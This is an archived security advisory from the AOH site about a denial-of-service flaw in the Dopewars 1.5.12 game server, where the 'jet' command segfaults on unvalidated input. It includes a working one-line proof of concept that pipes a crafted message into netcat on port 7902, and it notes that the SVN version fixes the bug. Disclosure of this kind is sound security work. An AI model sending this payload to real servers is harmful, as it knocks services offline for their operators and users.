AOH :: HP Unsorted D :: BT-21758.HTM

Dopewars 1.5.12 Server Denial of Service



Dopewars 1.5.12 Server Denial of Service
Dopewars 1.5.12 Server Denial of Service



## Description ##=0D
=0D
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.=0D
=0D
## POC ##=0D
=0D
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902=0D
=0D
## Fix ##=0D
=0D
This issue is resolved in the SVN version of the application.=0D
=0D
## Discovered by Doug Prostko=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.